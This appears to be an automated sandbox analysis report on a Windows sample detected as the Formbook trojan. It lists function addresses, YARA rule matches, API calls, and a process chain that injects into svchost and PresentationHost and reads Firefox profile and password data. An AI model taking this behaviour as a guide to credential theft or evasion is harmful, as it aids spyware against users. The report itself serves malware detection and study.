          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324AD001_2_0324AD00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DCD1F1_2_032DCD1F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03258DBF1_2_03258DBF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323ADE01_2_0323ADE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240C001_2_03240C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0CB51_2_032E0CB5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230CF21_2_03230CF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F132D1_2_032F132D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322D34C1_2_0322D34C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0328739A1_2_0328739A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032452A01_2_032452A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E12ED1_2_032E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325D2F01_2_0325D2F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325B2C01_2_0325B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327516C1_2_0327516C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322F1721_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0330B16B1_2_0330B16B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324B1B01_2_0324B1B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F70E91_2_032F70E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FF0E01_2_032FF0E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EF0CC1_2_032EF0CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032470C01_2_032470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FF7B01_2_032FF7B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032856301_2_03285630
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F16CC1_2_032F16CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F75711_2_032F7571
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DD5B01_2_032DD5B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033095C31_2_033095C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FF43F1_2_032FF43F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032314601_2_03231460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FFB761_2_032FFB76
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325FB801_2_0325FB80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B5BF01_2_032B5BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327DBF91_2_0327DBF9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B3A6C1_2_032B3A6C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FFA491_2_032FFA49
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F7A461_2_032F7A46
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DDAAC1_2_032DDAAC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03285AA01_2_03285AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E1AA31_2_032E1AA3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EDAC61_2_032EDAC6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D59101_2_032D5910
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032499501_2_03249950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325B9501_2_0325B950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AD8001_2_032AD800
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032438E01_2_032438E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FFF091_2_032FFF09
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FFFB11_2_032FFFB1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03241F921_2_03241F92
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03203FD21_2_03203FD2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03203FD51_2_03203FD5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03249EB01_2_03249EB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F7D731_2_032F7D73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03243D401_2_03243D40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F1D5A1_2_032F1D5A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325FDC01_2_0325FDC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B9C321_2_032B9C32
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FFCF21_2_032FFCF2
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeCode function: 3_2_082F00B73_2_082F00B7
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeCode function: 3_2_082F00B23_2_082F00B2
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeCode function: 3_2_082E99E73_2_082E99E7
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeCode function: 3_2_082E7A673_2_082E7A67
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeCode function: 3_2_082EE5973_2_082EE597
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeCode function: 3_2_08306F173_2_08306F17
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeCode function: 3_2_082E97C73_2_082E97C7
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FCE4F66_2_04FCE4F6
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FD24466_2_04FD2446
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FC44206_2_04FC4420
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FE05916_2_04FE0591
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F205356_2_04F20535
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F3C6E06_2_04F3C6E0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F1C7C06_2_04F1C7C0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F207706_2_04F20770
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F447506_2_04F44750
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FB20006_2_04FB2000
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FD81CC6_2_04FD81CC
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FE01AA6_2_04FE01AA
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FD41A26_2_04FD41A2
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FA81586_2_04FA8158
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FBA1186_2_04FBA118
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F101006_2_04F10100
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FA02C06_2_04FA02C0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FC02746_2_04FC0274
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F2E3F06_2_04F2E3F0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FE03E66_2_04FE03E6
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FDA3526_2_04FDA352
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F10CF26_2_04F10CF2
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FC0CB56_2_04FC0CB5
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F20C006_2_04F20C00
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F1ADE06_2_04F1ADE0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F38DBF6_2_04F38DBF
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FBCD1F6_2_04FBCD1F
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F2AD006_2_04F2AD00
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FDEEDB6_2_04FDEEDB
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F32E906_2_04F32E90
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FDCE936_2_04FDCE93
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F20E596_2_04F20E59
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FDEE266_2_04FDEE26
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F12FC86_2_04F12FC8
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F9EFA06_2_04F9EFA0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F94F406_2_04F94F40
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F40F306_2_04F40F30
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FC2F306_2_04FC2F30
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F62F286_2_04F62F28
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F4E8F06_2_04F4E8F0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F068B86_2_04F068B8
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F228406_2_04F22840
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F2A8406_2_04F2A840
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F229A06_2_04F229A0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FEA9A66_2_04FEA9A6
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F369626_2_04F36962
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F1EA806_2_04F1EA80
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FD6BD76_2_04FD6BD7
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FDAB406_2_04FDAB40
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F114606_2_04F11460
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FDF43F6_2_04FDF43F
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FE95C36_2_04FE95C3
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FBD5B06_2_04FBD5B0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FD75716_2_04FD7571
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FD16CC6_2_04FD16CC
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F656306_2_04F65630
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FDF7B06_2_04FDF7B0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FD70E96_2_04FD70E9
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FDF0E06_2_04FDF0E0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FCF0CC6_2_04FCF0CC
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F270C06_2_04F270C0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F2B1B06_2_04F2B1B0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F0F1726_2_04F0F172
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FEB16B6_2_04FEB16B
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F5516C6_2_04F5516C
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F3D2F06_2_04F3D2F0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FC12ED6_2_04FC12ED
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F3B2C06_2_04F3B2C0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F252A06_2_04F252A0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F6739A6_2_04F6739A
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F0D34C6_2_04F0D34C
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FD132D6_2_04FD132D
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FDFCF26_2_04FDFCF2
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F99C326_2_04F99C32
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F3FDC06_2_04F3FDC0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FD7D736_2_04FD7D73
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FD1D5A6_2_04FD1D5A
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F23D406_2_04F23D40
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F29EB06_2_04F29EB0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04EE3FD56_2_04EE3FD5
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04EE3FD26_2_04EE3FD2
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FDFFB16_2_04FDFFB1
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F21F926_2_04F21F92
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FDFF096_2_04FDFF09
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F238E06_2_04F238E0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F8D8006_2_04F8D800
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F299506_2_04F29950
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F3B9506_2_04F3B950
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FB59106_2_04FB5910
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FCDAC66_2_04FCDAC6
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F65AA06_2_04F65AA0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FBDAAC6_2_04FBDAAC
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FC1AA36_2_04FC1AA3
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F93A6C6_2_04F93A6C
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FDFA496_2_04FDFA49
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FD7A466_2_04FD7A46
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F95BF06_2_04F95BF0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F5DBF96_2_04F5DBF9
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F3FB806_2_04F3FB80
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FDFB766_2_04FDFB76
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_00B119006_2_00B11900
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_00B2A2806_2_00B2A280
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_00B0CB306_2_00B0CB30
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_00B0ADD06_2_00B0ADD0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_00B0CD506_2_00B0CD50
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_00B134206_2_00B13420
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_00B1341B6_2_00B1341B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03287E54 appears 107 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03275130 appears 58 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0322B970 appears 262 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 032AEA12 appears 86 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 032BF290 appears 103 times
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: String function: 00607F41 appears 35 times
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: String function: 00620D27 appears 70 times
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: String function: 00628B40 appears 42 times
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: String function: 04F67E54 appears 107 times
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: String function: 04F9F290 appears 103 times
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: String function: 04F0B970 appears 262 times
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: String function: 04F8EA12 appears 86 times
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: String function: 04F55130 appears 58 times
          Source: nJ8mJTmMf0.exe, 00000000.00000003.1661289845.000000000400D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs nJ8mJTmMf0.exe
          Source: nJ8mJTmMf0.exe, 00000000.00000003.1661178255.0000000003E63000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs nJ8mJTmMf0.exe
          Source: nJ8mJTmMf0.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.4125575598.00000000082C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1978005632.0000000003080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.4121800336.0000000004A74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1977710626.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.4121057875.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1978344060.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.4121859503.00000000045C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@15/11
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0066A2D5 GetLastError,FormatMessageW,0_2_0066A2D5
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00658713 AdjustTokenPrivileges,CloseHandle,0_2_00658713
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00658CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00658CC3
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0066B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0066B59E
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0067F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0067F121
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0066C602 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0066C602
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00604FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00604FE9
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeFile created: C:\Users\user\AppData\Local\Temp\aut8BB6.tmpJump to behavior
          Source: nJ8mJTmMf0.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: PresentationHost.exe, 00000006.00000002.4121169221.0000000002EB4000.00000004.00000020.00020000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4121169221.0000000002E90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: nJ8mJTmMf0.exeReversingLabs: Detection: 57%
          Source: unknownProcess created: C:\Users\user\Desktop\nJ8mJTmMf0.exe "C:\Users\user\Desktop\nJ8mJTmMf0.exe"
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\nJ8mJTmMf0.exe"
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeProcess created: C:\Windows\SysWOW64\PresentationHost.exe "C:\Windows\SysWOW64\PresentationHost.exe"
          Source: C:\Windows\SysWOW64\PresentationHost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\nJ8mJTmMf0.exe"Jump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeProcess created: C:\Windows\SysWOW64\PresentationHost.exe "C:\Windows\SysWOW64\PresentationHost.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeSection loaded: userenv.dllJump to behavior
